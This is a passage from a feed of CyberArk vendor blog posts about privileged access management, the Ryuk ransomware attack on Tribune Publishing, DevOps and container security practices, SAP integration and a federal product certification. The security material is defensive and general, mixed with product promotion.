I doubt that Amazon’s Alexa Super Bowl ad was supposed to send viewers down this line of thinking, but let’s hope that other vendors of AI powered technology will share the “not everything makes the cut” sentiment of this ad so that we don’t end up in the “Click Here to Kill Everybody” future envisioned by Bruce Schneier where smart devices leave us open to cyber-attacks from all directions.

If your organization has questions about how to secure AI enabled systems, click here to learn more about the CyberArk Marketplace, which features CyberArk Privileged Access Management integrations with ICS and RPA.

]]>
Three Things to Consider When Picking a Privileged Access Management Solution for your Cybersecurity Strategy https://www.cyberark.com/blog/three-things-to-consider-when-picking-a-privileged-access-security-solution-for-your-cybersecurity-strategy/ Thu, 31 Jan 2019 20:37:03 +0000 https://www.cyberark.com/?p=36100

You know that protecting privileged access is paramount in your cybersecurity strategy. But how do you go about selecting the right solution from the right provider? The “Privileged Access Security for Dummies” eBook is the guide you’ve been looking for. Full of actionable tips, technical insight and lessons learned, the eBook delves into the three critical steps to take as you evolve your cybersecurity strategy. The following is a quick look at these recommendations. For full details on what to expect and what to look for as you evaluate potential privileged access management solutions, download a free copy of the eBook today.

  1. Determine where automated tools and services will help you most. Protecting, managing and monitoring privileged access manually can be a tedious, resource-intensive process. It’s nearly impossible for a large organization to manage and protect the thousands of privileged accounts, credentials and secrets used throughout its on-premises, cloud and DevOps environments without automation.

An industry survey revealed that more than half of enterprises (55 percent) see an excess of 10,000 security alerts per day – with 27 percent seeing more than one million daily. Considering these numbers, it’s easy to see how manual analysis of privileged access management risks and vulnerabilities can be prone to human error. One missed alert can result in millions of dollars spent on incident response and recovery. Implementing privileged access management that can automate manual tasks can help your organization simplify operations, improve efficiencies and free up valuable IT staff to focus on strategic tasks – while bolstering your overall security posture.

  1. Understand both current and future use cases for privileged access management solutions. The vast majority of breaches today involve privileged account compromise, so protecting access is a top priority. But, you can’t protect what you can’t see. Only after a comprehensive inventory and assessment of your privileged accounts, credentials and secrets can you effectively determine what security features your organization will need to stay safe now and into the future.

When evaluating privileged access management solutions, it’s important to think beyond your current requirements. Consider how your company’s technology strategy is evolving. Your cybersecurity strategy will need to evolve along with it. Are you moving more workloads to the cloud? Is there an initiative underway to adopt DevOps practices? Then, assess if the solution you’re considering can scale in complex environments, provide out-of-the-box support for existing security systems, and easily integrate with other vendors and applications you work with now – or may work with in the future.

  1. Create a matrix to help evaluate available platform options and providers. Before you begin your search, it’s helpful to develop a simple scoring matrix that outlines required and desired capabilities. This will enable you to assess your current and future use cases against available features and providers. Though every organization has different needs, common evaluation criteria for a privileged access management solution can include:
  • Password management. Does the solution provide flexible and configurable password rotation for users, applications and DevOps tools?
  • Security and recoverability. Does the solution feature an isolated digital vault, hardened and secured to store credentials and privileged session recordings securely? Does it offer multiple options for high availability and disaster recovery?
  • Audit and monitoring. Does the solution provide strong support for audit and monitoring, as well as the ability to detect anomalous account behavior?
  • Tool integration. Does the solution easily integrate with a broad range of IT and security operations tools?
  • Privileged account discovery. Does the solution have capabilities to systematically locate privileged accounts and credentials?
  • Privileged task automation. Does the solution have the ability to automate routine privileged access tasks?
  • Cloud security. Does the solution have the ability to secure, monitor and control access to the “as-a-service” offerings your company uses or plans to use going forward?
  • DevOps management. Does the solution provide comprehensive management of all sensitive elements in the DevOps process?
  • Flexible and scalable architecture. Is the solution architected to accommodate flexible deployment options as your deployment scales?

Following these important steps during your evaluation process will ultimately help you to select the privileged access management provider that best meets your needs, best integrates with your broader security portfolio and has the best long-term support, so you know it will be there when you need it.

Click here to download “Privileged Access Security for Dummies” and learn more.

]]>
Data Privacy Day Celebrates a New Era in Privacy https://www.cyberark.com/blog/data-privacy-day-celebrates-a-new-era-in-privacy/ Mon, 28 Jan 2019 17:50:07 +0000 https://www.cyberark.com/?p=36018

Today is 10th annual international Data Privacy Day. Data Privacy Day commemorates the signing of the first legally binding international treaty on data protection on January 28, 1981 – Convention 108. The holiday was originally celebrated in Europe – where the originally treaty was signed – but, in 2009, the U.S. and Canada joined the celebration. In the United States, Data Privacy Day is sponsored by the National Security Alliance (NCSA).

This year, the theme of Data Privacy Day is “A New Era in Privacy.” As the technology landscape changes, how do you maintain your privacy while forging ahead as a thought leader? The Data Privacy Day event features lectures and panel discussions from experts in business, academia, research and advocacy. They will cover topics like compliance and thought leadership, privacy and breakthrough technology, privacy in the cloud and the GDPR and California Consumer Privacy Act.

While GDPR has made individuals more privacy-aware, there are many cases where poor security habits persist. A recent CyberArk survey showed that nearly half of office workers have had access to sensitive documents, including HR data. Additionally, the survey showed that nearly one in five (19 percent) office workers report that their IT security team is experimenting with biometric security techniques, including fingerprint and retinal scans and embedded microchips – a further step in addressing emerging privacy concerns in the workplace. With its “A New Era in Privacy” theme, Data Privacy Day addresses innovations in data privacy like these.

LinkedIn is hosting Data Privacy Day this year at its San Francisco headquarters from 1:30 to 5:30 PST. For anyone who can’t make the trip, the event is available on livestream.

]]>
Real Substance on Privileged Access in DevOps and Cloud https://www.cyberark.com/blog/real-substance-on-privileged-access-in-devops-and-cloud/ Fri, 25 Jan 2019 14:06:33 +0000 https://www.cyberark.com/?p=35756

If you share a generation with me (which is, uh, old), then you likely will remember those great Wendy’s TV commercials from the mid-80’s. In each of those ads, an elderly actress named Clara was handed a huge round bun surrounding a tiny burger patty. Her reaction included the now-famous phrase: “Where’s the beef?” Walter Mondale used the phrase to help win the Democratic primary that year against Gary Hart. It was a good concept, to say the least.

I often find myself wondering where the beef is in many of the cybersecurity reports that cross my desk each year. This is particularly true for technical and marketing documents that focus on popular concepts such as cloud and virtualization – primarily because this is where we are all looking for assistance. Most of these narratives are long on superlatives, and short on details – not unlike Clara’s big bun and tiny patty.

But I found one prominent exception today – one that appears to be filled with useful, accurate details. The topic involves optimizing privileged access in the context of DevOps and Cloud Computing environments. Sponsored by CyberArk, this beefy report includes contributions from thirteen prominent enterprise security executives. Available for download here, it’s details can be summarized below – hopefully without including too much spoiler material.

The report begins with a clear exposition of the typical modern DevOps pipeline with a clear explanation of the support tools used during the various phases of build, code, plan test, release, deploy, operate, monitor, and plan. The overlay diagram of commercial and free tools used during application of the DevOps methodology is especially useful in understanding automation in modern continuous delivery.

The report also includes specific guidance on the most familiar shortcuts that lead to privilege-related security issues in the context of DevOps and Cloud. I’ll let you discover the full list in the report, but I can tell you that it starts with the observation that credentials used in DevOps are prime targets for attackers. This is 100% consistent with my own experience, and such insight is vital to selecting the proper DevOps security controls.

The report concludes with several specific recommendations on immediate actions that can be taken by enterprise security teams to reduce privileged access-related risk in DevOps and Cloud. My favorite recommendation is that companies should transform their security teams into full DevOps partners. This has the benefit of helping software developers make the right decisions in their DevOps tasks.

Now, I know that everyone in our industry is busy, and we all have limited time to go through technical reports. But this one is worth your while: It has substance, it includes specific details, and it includes actionable recommendations that will help you in your day-to-day DevOps and Cloud-related activities. And one thing I can promise: Once you’ve completed the report, you will not be asking: Where’s the beef?

Download the CISO View and start learning best practices for protecting privilege access in cloud environments.

Edward Amoroso is the CEO of TAG Cyber, a global cybersecurity advisory, training and media company. Amoroso is also the former Senior Vice President and Chief Security Officer of AT&T, where he worked for 31 years. Find him on LinkedIn and Twitter.

]]>
NIST Guidance for Financial Services: Protecting Privileged Access is a Business Imperative https://www.cyberark.com/blog/nist-guidance-for-financial-services-protecting-privileged-access-is-a-business-imperative/ Thu, 24 Jan 2019 15:27:36 +0000 https://www.cyberark.com/?p=35743

Success in today’s financial services market means constantly innovating to meet evolving customer expectations, such as enhanced personalization, mobile banking and cloud-based digital service options. Yet digital disruption and deeper customer engagement mean financial institutions must rely on a broader ecosystem of vendors, partners and disparate internal teams and systems. This results in a host of new privileged users and applications that have access to the organization’s information systems and proprietary information.

Both external attackers and internal malicious actors seeking to compromise financial systems understand this and have focused their efforts on privileged credentials.

New NIST Guidance on Managing Privileged Access
To help the financial sector harden defenses against cyberattacks and privileged credential misuse while continuing to drive digital transformation initiatives, the National Institute of Standards and Technology (NIST) recently released draft guidance on “Privileged Account Management for the Financial Services Sector.” The publication – available in its entirety here – outlines a robust reference design illustrating how financial institutions can implement a comprehensive privileged access management (PAM) system to effectively secure, manage, control and audit privileged accounts.

A worthwhile and informative read, the piece comprises practical guidance and common use-case scenarios to help financial services organizations overcome PAM security challenges and:
• Identify vulnerabilities and risk factors within their environment
• Limit the opportunity for a successful attack by improving control over privileged accounts
• Improve efficiencies by reducing the complexity associated with managing privileged accounts
• Minimize the damage that results from misuse and mistakes by internal/external actors
• Automate enforcement of existing access policies
• Simplify compliance by producing automated reports and documentation

Safeguard Stronger Customer Engagement with CyberArk
The need to innovate means financial services organizations continue to expand and evolve. However, this agility needs to be anchored by a comprehensive, time-tested and proven PAM solution. Used by 21 of the top 25 financial organizations worldwide and consistently recognized by top analysts as a market leader, the CyberArk Privileged Access Security Solution is the only solution that can detect and prevent privileged attacks across on-premises, cloud and DevOps environments.

Discover how to capture new opportunities without jeopardizing brand reputation or regulatory compliance by downloading our industry brief, running a cost-free network scan to uncover potential sources of risk or engaging the CyberArk Red Team to test your organization’s ability to effectively defend against cyberattacks.

]]>
Stop the Presses: Ryuk Holds LA Times for Ransom https://www.cyberark.com/blog/stop-the-presses-ryuk-holds-la-times-for-ransom/ Thu, 17 Jan 2019 14:24:42 +0000 https://www.cyberark.com/?p=35674

A recent malware attack disrupted nationwide distribution of major newspapers affiliated with Tribune Publishing. The attack delayed distribution not only of the LA Times and the San Diego Union Tribune, but also interrupted distribution of The Wall Street Journal and New York Times on the West Coast, since they share a printing press with the LA Times.

The malware was identified as Ryuk, a piece of ransomware code named after the god of death in the popular Japanese manga Death Note and Ryuk tries to live up to its namesake. Unlike most Ransomware, Ryuk is used exclusively for targeted attacks. Once it infects an organization’s network, it spreads rapidly from computer to computer, encrypting important files behind unbreakable code.

Anyone who tries to access the encrypted data gets a ransom note from the attacker demanding bitcoin in exchange for freeing the data. If the organization refuses to pay, then Ryuk promises to keep the important files locked up forever. The goal of Ryuk ransomware isn’t to steal information, but to shut the victim down.

CyberArk Labs has been aware of Ryuk since it was identified by our compatriots at Check Point Research as a part of the HERMES family of ransomware. As part of its ongoing malware research, CyberArk Labs has thoroughly tested variations of Ryuk to understand it behavior and support the evolution of CyberArk solutions to preventing this ransomware from encrypting files.

Tribune Publishing first noticed it had a problem when sports editors at the San Diego Union Tribune attempted to send digital files to the plate making facility. Digital files containing anything that was meant for publication would not transmit to the plate making process. The editors were locked out of the system and unable to go to press as usual. Newspapers pride themselves on their timeliness, but with Ryuk malware in the way, the presses were running late. According to the LA Times, between 80 and 85 percent of San Diego Union-Tribune’s Saturday paper didn’t reach subscribers the weekend after the attack.

Once programmers at Tribune Publishing and the LA Times identified that they were dealing with an attack, they started working to isolate the malware code. But, they ran into additional problems with every new file they tried to access. Eventually, the programmers were able to start making progress toward containing Ryuk and bringing the Tribune Publishing servers back online. Unfortunately, the security patches didn’t hold and Ryuk re-infected the network.

It’s extremely important to keep Ryuk from ever gaining a foothold in your network. The best way to do that is to lockdown the endpoints, containing the attack early in its lifecycle. This can be done by enforcing least privilege on endpoints and using credential theft protection to actively shield against malware. According to Check Point Research, Ryuk needs admin credentials in order to inject its code and begin file encryption. One of the main functions of privilege management is to restrict access to credentials, making it much more difficult for malware like Ryuk to gain access to the kind of account it needs. Check Point Research added that before Ryuk is deployed, the attackers behind it need to collect extensive credentials from the system they intend to infect. Credential theft protection keeps these credentials out of attackers’ hands.

For more research on the connection between malware and credential theft, check out the CyberArk Threat Research blog from the CyberArk Labs team.

]]>
CISO View Insights from the Global 1000: Five Steps for Integrating Security with DevOps https://www.cyberark.com/blog/ciso-view-insights-from-the-global-1000-five-steps-for-integrating-security-with-devops/ Wed, 16 Jan 2019 14:11:52 +0000 https://www.cyberark.com/?p=35429

The Challenge – Security vs. Velocity

While organizations are increasingly adopting DevOps tools and methodologies and seeing tremendous business benefits, it is not always clear that security remains a priority. The truth is that, while developers want security, when security threatens to slow down getting new applications to customers (whether internal or external), security suffers.

It’s an issue CISOs across the globe face – how do you prioritize security without impacting developer velocity?  CyberArk, in conjunction with independent research firm Robinson Insight, has assembled an expert panel of CISOs from the world’s leading organizations to discover their best practices and real-world insights into protecting privileged access. Here are some of their key ideas.

Top Five Tips for Integrating Security into the DevOps Environment

1.) Transform the security team into DevOps partners. Many DevOps practitioners do take security seriously; in fact, in the Sonatype DevSecOps Community Survey 2018  91% agree that “security is part of everyone’s job.” So, for security, the challenge can be harnessing the developers’ beliefs and energy. For example, security teams can engage more effectively by getting up to speed on DevOps tools and techniques. They can also help developers to do the right thing by offering reusable code modules, and self-service approaches that make it easier for developers to adopt good security practices.

2.) Prioritize securing DevOps tools and infrastructure. Some important places to get started are reducing the concentration of privilege in the build automation tools and ensuring that code repositories do not expose secrets.

3.) Establish enterprise requirements for securing secrets and credentials. Instead of struggling to consistently control and monitor secrets dispersed across multiple DevOps tools, a better approach to reducing risk and saving time is to implement a centralized secrets management system. The centralized secrets management platform can then be used to ensuring that users, whether human or machine, don’t see the actual credentials.

4.) Adapt processes for application testing. With DevOps teams making multiple releases per day, security needs to implement new, automated approaches so as not to slow the process down. For example, security can develop automated, updated processes, such as a “break the build” approach.

5.) Evaluate the results. In most cases, improving the security of DevOps environments happens through many incremental advances. Teams should highlight each success and then build and expand from them. For example, organization can use metrics to show how much of the attack surface has been addressed and how effective controls are.

The CISO View – DevOps and Cloud Environments

These insights are a small sample of the information assembled by a diverse body of CISOs. Working with the panel of expert CISOs, CyberArk has created a report that provides security leaders with important insights and education.  Contributors to the report include security and IT executives from ING Bank, CIBC, Rockwell Automation, Lockheed Martin, Starbucks, Pearson, Asian Development Bank, American Express, NTT Communications, Carlson Wagonlit Travel, Orange Business Services, American Financial Group (AFG) and GIC Private Limited.

The goal of this report, The CISO View, is for security leaders to be able to leverage these experiences and apply them in your own environments. Security and DevOps can be stronger together – The CISO View experts can show you how to get them there.

Download the Full Report

To learn more…

Download the free report.

Watch a brief video that highlights the top 5 recommendations.

Read the press release.

Attend the webinar on February 26th.

Visit the CISO View page.

]]>
Raise the Stakes with Privileged Threat Analytics https://www.cyberark.com/blog/raise-the-stakes-with-privileged-threat-analytics/ Mon, 07 Jan 2019 13:45:37 +0000 https://www.cyberark.com/?p=31963

Brian Koppelman and David Levien’s 1998 cult classic poker movie “Rounders” begins with Matt Damon’s character Mike McDermott narrating, “If you can’t spot the sucker in your first half hour at the table, then you are the sucker.” It’s a memorable line that sets the tone for the entire film.

A theme reinforced throughout the movie is that contrary to popular belief, poker is more about playing your opponent than playing the cards you hold. Cyber attackers know this quite well and can easily spot the “suckers” – and they routinely target these weak links in cyber-attacks (see lesson 2 below). Security teams are often dealt a tough hand – from preexisting tools that fall short, to budget constraints, staffing deficits and more. Security teams must learn to think one step ahead of their opponents (i.e., malicious attackers, insider threats, etc.), have a sound strategy in place and stick to their game plan in order to successfully beat formidable foes. Following are three lessons security teams can learn from the poker table.

Lesson 1: Threats loom even (especially) when you don’t expect them

In the opening scene of “Rounders,” Mike McDermott becomes enamored with his cards (a full house of nines over aces) and falls into an easy trap set by his opponent, the nefarious Teddy KGB (a ludicrous character portrayed by John Malkovich). Mike inevitably is blindsided and loses all of his money when it’s revealed that Teddy has aces over nines.

It can be easy for organizations to fall into the same trap as Mike McDermott and become complacent in their efforts to secure privileged access. In order to really stay ahead of the game, organizations need a way to detect and respond to anomalous behavior going on inside of their environment. Threats lurk around every corner, attackers are constantly coming up with new ways to break into organizations’ environments with the intent of causing damage. This can be accomplished by having a privileged threat analytics engine in place to complement other tools (like SIEMs and UEBAs), generate risk scores for privileged sessions, and deliver alerts to security operations centers (SOC) if/when suspicious behavior involving privileged access occurs. It’s about as common as a royal flush (roughly 1 in 30,939) that an organization would have dedicated employees sit and watch all video logs of privileged sessions, so having a tool that is also able to prioritize events is an absolute must. Without this privileged threat analytics piece, security teams are left with video recordings that they’ve captured to meet compliance requirements but they aren’t leveraging to detect and prevent attacks that are in process.

Lesson 2: Sharks always exploit the weakest link

In one of the (relatively) light-hearted scenes in the movie that also traces back to the opening line, Mike and his collective group of card shark friends are playing a low-stakes game in Atlantic City. Eventually, an unsuspecting tourist has the misfortune of sitting at their table and is quickly stripped of his money. There’s an easy parallel to be made here between how attackers look for the path of least resistance, repeatedly target the weak link in an organization and often go undetected until their target is breached.

The latest Mandiant M-Trends report states that it takes an average of 101 days from the time of breach to discovery.[1] Sophisticated attacks on Kerberos authentication such as Golden Ticket type attacks against Domain Controllers typically take even longer to detect. Attackers go unnoticed for months on end, and by the time they’re finally discovered, there is very little that security teams can do. Often times, these attacks start with a phishing attack in which an attacker gains entry to a network by getting an unsuspecting victim to click on a link. The attacker then gains access to the network and proceeds to move laterally until gaining access to critical infrastructure such as Domain Controllers.  With a privileged threat analytics tool in place, security teams cannot not only identify when a Golden Ticket is occurring but also take steps to halt the attack such as rapidly changing the password for the KRBTGT account in rapid succession.  (For those of you who are curious, the KRBTGT account is a local default account that acts as a service account for the Key Distribution Center (KDC) service.  An attacker who gains access to this account can rob an organization blind similar to what happens to the unsuspecting tourist in the movie).

Lesson 3: Study the behavior of your surroundings

The finale of the movie pits Mike McDermott against Teddy KGB, playing in an all-or-nothing game of heads-up poker, where if Mike loses, he faces the direst of consequences. While playing, Mike notices that every time Teddy KGB starts eating Oreos from the tray in front of him, he has a great hand. In poker, this is called a “tell.” Mike gets crushed at the onset, but eventually gets pulled into a hand with a good set of cards (similarly to the opening scene) and is in desperate need of a win. However, he folds because he sees Teddy chomping away at his Oreos. He lets Teddy know that he knows his tell, which completely rattles Teddy and changes the course of the game. (**Spoiler**) By taking this path, Mike eventually comes out on top.

For security teams, the lesson is to always pay attention to your surroundings – from humans accessing critical systems to applications communicating with other applications, or some combination of the two. For instance, if a machine that contains sensitive data is being accessed during irregular hours, and/or from an irregular IP, an alert can be sent to the SOC to prompt further investigation of the event. In some cases, administrators may opt to set policies to automatically suspend these sessions until they can be verified. Having tools in place that pay attention to privileged behavior can help organizations to develop a baseline for what’s “typical,” rapidly flag things that seem to be out of the ordinary (an attacker’s tell) and provide the ability to quickly respond to the threat. These tools can mean the difference between a breach and business continuity.

The CyberArk Privileged Access Security Solution provides organizations with the controls to secure privileged access, detect when suspicious activity is occurring and prevent attacks that are underway as soon as possible. The CyberArk solution works with leading SIEM and UEBA tools such as LogRhythm, Splunk, QRadar and more to enable organizations to collect, detect, alert and respond to high-risk activity and behavior involving privileged access. Protection from advanced threats requires a complete layer of privileged access management; check out these integrations and more at the CyberArk Marketplace, here.

[1] Mandiant M-Trends 2018 report

]]>
Q&A: Securing SAP ERP Systems with CyberArk https://www.cyberark.com/blog/qa-securing-sap-erp-systems-with-cyberark/ Wed, 02 Jan 2019 16:12:01 +0000 https://www.cyberark.com/?p=31932

Privileged accounts exist in every layer of an ERP system implementation, from the underlying infrastructure to the enterprise applications powering the business. In the right hands they help safeguard business-critical assets and data. In the wrong hands they can be used to disrupt operations and steal confidential information.

In a recent, popular On the Front Lines webinar, we explored critical challenges enterprises face in protecting SAP ERP systems, and we also gave a quick demo of the CyberArk SAP Certified Privileged Access Security Solution. We had a large audience and a number of technical questions were raised and addressed during the session. Following are some excerpts. You can also read presentation takeaways or tune in to the full webinar and demo on demand.

Q: What type of configuration in SAP is required to set up SAP with CyberArk?

You don’t have to do anything specific inside SAP to start managing privileged credentials with CyberArk. Since we use the native SAP API to rotate credentials, the CyberArk solution will appear just like any other SAP client from the outside to SAP, and therefore, no special changes or installations are required.

You can utilize CyberArk SAP Scanner to detect privileged accounts across the SAP system. Once you have a good handle on where these accounts exist and how many there are, you can automatically onboard these privileged SAP accounts through a configuration within the CyberArk Enterprise Password Vault leveraging the CyberArk REST API. Within minutes, you can apply policies to effectively manage these credentials in a single location and prevent unauthorized access to critical systems. Additionally, you can begin to rotate and update credentials at regular intervals or on demand (based on policy), including managing the sensitive DDIC credentials used in the SAP upgrade process.

Q: Does CyberArk integrate with SAP HANA Database and SAP Java Portal?

Through CyberArk’s partnership with SAP, Certified by NetWeaver we integrate with SAP HANA – you can view details of this integration on the CyberArk Marketplace, as well as several other SAP integrations including SAP Concur, SAP GUI, SAP Sybase ASE Database – Adaptive Server Enterprise and SAP Sybase ASE ODBC Driver.

For integration needs for Java Portal, please get in touch with your CyberArk representative, so we can learn more about your integration needs. We’re more than happy to work with you on a customized solution, and we continue to add new integrations to the CyberArk Marketplace regularly.

Q: How long can you store session recordings and histories?

Session information storage time can be configured to your organization’s specific needs. You can keep them for one year, five years or longer as required. You can also specify where these recordings are stored. For example, you can store the SAP recordings within CyberArk and the operating system recordings elsewhere if you choose.

Remember that the average lag time from a breach to discovery is 99 days. If you’re deleting your recordings after just three weeks, you’re going to lose a lot of material that could be helpful during a forensics process. A best practice for SAP-related recordings is to store them for about 18 months.

Q: Can you explain how override accounts work in SAP environments?

A reconciled user inside the CyberArk solution is a privileged account on the target system inside SAP that can be used to override the password of other privileged accounts. As an example, imagine you would have the password of DDIC, which is not synchronized anymore. In other words, something went wrong or perhaps somebody actually modified the password during the session manually. You can use a reconcile account to override that password. Of course, adequate privileges are required to perform such an override action. The recommendation here would be to use a very powerful, high privileged user.

Editor’s Note: These responses have been edited for clarity and brevity. Have additional questions about protecting your ERP applications and systems? Check out the following resources or get in touch with us.

]]>
Discover the Power of We: SailPoint + Okta + CyberArk https://www.cyberark.com/blog/discover-the-power-of-we-sailpoint-okta-cyberark/ Fri, 28 Dec 2018 14:41:07 +0000 https://www.cyberark.com/?p=31723

Organizations have more challenging and pressing technology concerns than ever before. Maintaining a modern computing environment means more applications, more users and more data living in more places. This, of course, also means more risk. Protecting high-value assets against increasingly damaging cyber attacks – while effectively balancing efficiency and user productivity – requires both innovation and collaboration. We’ve continued to expand the CyberArk C3 Alliance, extending the power of privileged access security to help organizations better protect against advanced threats through a deeper set of innovative cyber security solutions.

As part of this ongoing initiative, we joined forces and hit the road with C3 Alliance partners SailPoint and Okta this fall, traveling across North America together to share our unified identity solution that addresses every aspect of an organization’s identity needs including access management, identity governance and privileged access.

Throughout this roadshow series, organizations from Seattle to Tampa learned how to securely manage and govern all users – including both privileged and non-privileged application and data access – across the employee/partner lifecycle, from onboarding through off-boarding. With these best-of-breed solutions integrated, enterprises can ensure essential identity functions are secure and automated, authorization policies are enforced, and user access activity is documented and compliant. The result is that enterprises can maintain a high level of user productivity, compliance and security.

Together with SailPoint and Okta, we’ve compiled key takeaways from these roadshows and created several resources to help organizations learn how to securely and effectively authenticate, provision and govern access to all applications and data across a hybrid cloud and on-premises enterprise:

VIDEO: Okta, SailPoint, CyberArk: The Powers of Identity and Privilege

In two minutes, learn why some of the world’s leading organizations turn to an integrated solution to mitigate the risk of a security breach, ensure compliance and automatically enable today’s modern workforce. You can also check out our short videos showcasing the CyberArk Privileged Access Security integration with Okta SSO and MFA and integration with SailPoint Identity Governance.

eBook: The Powers of Identity Governance and Privileged Access Security

Explore how the integration between SailPoint Identity Governance and CyberArk Privileged Access Security allows organizations to close security gaps, reduce risk and eliminate redundant processes related to managing non-privileged and privileged access.

Buyer’s Checklist: Evaluating Your Control Over Identity and Privileged Access

Where do you stand in managing your non-privileged and privileged users/applications? This checklist is designed to help you identify where to focus your efforts to more effectively and efficiently close security gaps, reduce risk and manage identity and access management.

To learn more about the “Identity Trifecta” of integrated SailPoint, Okta and CyberArk solutions, visit the CyberArk Marketplace.

]]>
Securing Containers: Understanding and Mitigating Vulnerabilities https://www.cyberark.com/blog/securing-containers-understanding-and-mitigating-vulnerabilities/ Fri, 21 Dec 2018 20:25:37 +0000 https://www.cyberark.com/?p=31749

Adoption of containers as a means to package and run applications continues to surge. There are many benefits driving this trend, first and foremost for developers, but also extending across the entire application lifecycle.

While container adoption continues to soar, organizations face a number of critical challenges in protecting the secrets and credentials necessary for a containerized workflow.

In a recent On the Front Lines Webinar, we explored several container-specific security vulnerabilities and the techniques to address them, which are applicable to Docker, Kubernetes and popular platforms such as OpenShift and Cloud Foundry.

To set the stage, we examined a typical Docker workflow. This includes the initial client request to the host (which comprises the Docker daemon, containers and images) and the registries that house all of the images. The Docker daemon is a service that runs on the host OS and manages both the containers and images. It looks out for API requests from Docker and also acts as the communication layer to manage other services within Docker. (You can read more about this here).

There are six specific points throughout this Docker ecosystem that could be breached at any given point in time and lead to either malicious or unintended consequences. Following is a look at each of these steps, along with best practices to mitigate risk.

  1. Unsecured access to the Docker API. Users added to the “Docker” group can use all Docker functions that utilize images and containers. To mitigate risk, do not add all accounts to the “Docker” group and enforce least privilege policies to limit commands that can be sent by a user.
  2. Passing secrets from host to container using environment variables at run time. Secrets can be passed through to the Docker container at run time using the “-e“ flag. These secrets have to be passed through in clear text. Any automation scripts will have to define these variables. As part of this, any user with access to the Docker API will be able to grab the secret information. It’s essential to limit commands available to the user and secure host access by monitoring privileged user sessions.
  3. Running containers with the privileged flag. Running containers with the “—privileged” flag provides the container with direct access to host elements such as devices and other pieces of hardware. To minimize the risk of data breaches and outages associated with uncontrolled access, it’s important to enforce least privilege policies across your Docker hosts.
  4. Running containers as root. By not declaring a user for each container or using the “—user” flag, container users have access to the same GUID and UID as the host machine – even if the passwords are different. This can lead to the container(s) gaining access to files on the host machine if they are mapped within the container. It’s important to always map to a known user at the end of your Dockerfile and also restrict access to Docker run time commands.
  5. Insecure image registries. All containers come from one or more registries. With unsecured access to registries, an attacker can manipulate your images to add code – without your approval or knowledge. To prevent this from happening, you should always secure your registries with SSL/TSL, create distinct users, store user(s) and certificate information in a secure vault and regularly rotate credentials.
  6. Unsecured access to the Docker host(s). All of your efforts to protect your Docker APIs, image registries, etc. will be for naught if an attacker can access your host machine(s). Therefore, all SSH and web page connections to your Docker/orchestration host machine should be monitored and recorded, and all root accounts should be managed, stored and regularly rotated in a secure vault.

While there’s no question that containers are here to stay, they have introduced a host of new security challenges that must be addressed. Now is the time to assess your container environment and begin protecting privileged access.

For tips on getting started, tune in to the full webinar, check out CyberArk Conjur and its comprehensive integrations with leading container platforms or contact your CyberArk team for a full evaluation.

]]>
CyberArk Adds the Privileged Access Security Solution v10.4 to the DoDIN APL https://www.cyberark.com/blog/cyberark-adds-the-privileged-access-security-solution-v10-4-to-the-dodin-apl/ Mon, 17 Dec 2018 17:58:05 +0000 https://www.cyberark.com/?p=31647

It’s been nearly a decade since the Department of Defense (DoD) created the Department of Defense Information Network Approved Products List (DoDIN APL) to highlight tried and tested solutions that specifically address government security concerns. The APL was developed in an effort to maintain a single consolidated list of products that meet the demands of the nation and our growing need to protect and secure sensitive data and networks. Completing the certification process is an indication to agencies and government end users that all listed products have undergone rigorous DoD testing regulations; passing stringent information assurance (IA), interoperability (IO), Common Access Card (CAC)/Public Key Infrastructure (PKI), and IPv6 requirements.

U.S. government procurement for products that are on the DoD network is limited to only those solutions that have completed this strenuous testing process. The DoDIN APL now serves as the agency’s master list of readily available solutions that are approved to operate within the defense technology infrastructure.

We are happy to announce that the CyberArk Privileged Access Security Solution v10.4 has completed testing and was certified effective October 4, 2018 as a Cybersecurity Tools (CST) device type (Tracking Number (TN) 1712401).

We previously received both APL and Common Criteria (CC) designations for v9.1 of the CyberArk solution in early 2016 and are currently certifying v10.4 for CC under a National Information Assurance Partnership (NIAP) protection profile.

CyberArk’s Commitment to the Federal Government Agencies

The CyberArk Privileged Access Security Solution has been independently validated and awarded an Evaluation Assurance Level (EAL) 2+ under the Common Criteria Recognition Agreement (CCRA). We’ve received the U.S. Army Certificate of Networthiness (CoN) enabling the streamlined implementation of the CyberArk solution on the Army Enterprise Architecture/LandWarNet (LWN). You can visit the Army CoN website for more details on the CyberArk certification #201621511 (requires CAC for access). Prioritizing both obtaining and maintaining these certifications demonstrates CyberArk’s continued commitment to helping federal government agencies proactively protect privileged users and credentials across networks.

Here are a few ways in which CyberArk can help meet security and compliance requirements in federal government agencies:

  • FISMA/NIST SP800-53 – CyberArk solutions help federal government agencies comply with requirements related to the “Access Control,” “Audit and Accountability” and “Identification and Authentication” control families.
  • Department of Homeland Security CDM Program – Phase 2 of the Continuous Diagnostics and Mitigation (CDM) program features least privilege and infrastructure integrity requirements which can be addressed with CyberArk solutions.
  • NERC – CIP – Requirements related to privileged access control, remote access management and access revocation in the regulation can be addressed with CyberArk solutions.
  • HSPD-12 – The requirement to authenticate using a Personal Identity Verification (PIV) card can be easily implemented across all current and legacy systems with the seamless integration of CyberArk solutions and PIV cards.

You want Federal White Papers? We’ve got Federal White Papers:

To learn more, visit https://www.cyberark.com/solutions/federal-government-solutions/.

]]>
Ready Player One: A Synopsis on Terrible Password Management in a Dystopian Future https://www.cyberark.com/blog/ready-player-one-a-synopsis-on-terrible-password-management-in-a-dystopian-future/ Fri, 07 Dec 2018 20:40:25 +0000 https://www.cyberark.com/?p=31152

Last week I was on a plane alongside my fellow brethren of cloud poindexters and developer geeks (with the occasional C-level exec mixed in) to attend the annual AWS re:Invent conference. After browsing the in-flight entertainment, I came across the trailer for “Ready Player One” and couldn’t resist a Steven Spielberg science fiction movie chock-full of ‘80s pop culture references.

A Quick Movie Recap (Spoiler Alert)

The setting of the film is in a dystopian future where fossil fuels have been exhausted, the world has become overpopulated, every country has gone to war and the effects of global warming have finally taken their toll on the planet (totally unrealistic right?!). As a means to escape this grim existence, a group of developers created a virtual reality known as ‘the OASIS,’ allowing users to create an avatar and interact in this new world via ‘kinesthetic communication.’ The OASIS provides a virtual refuge and the ultimate freedom of choice for users to “be” and “do” whatever they desire.

Fast forward and one of the founding developers passes away, but just prior to doing so he creates a three-part challenge whereby the winner inherits not only an absurd amount of money, but more importantly, complete and total control over the world’s most important economic resource – the OASIS.

The hero of the story, Wade Watts (avatar name: Parzival) devotes all of his time trying to complete the challenge as his only hope to escape the clutches of poverty. Wade isn’t the only one trying to get the keys to the OASIS. Innovative Online Industries (IOI) and its CEO, Nolan Sorrento, stop at nothing to win the challenge.

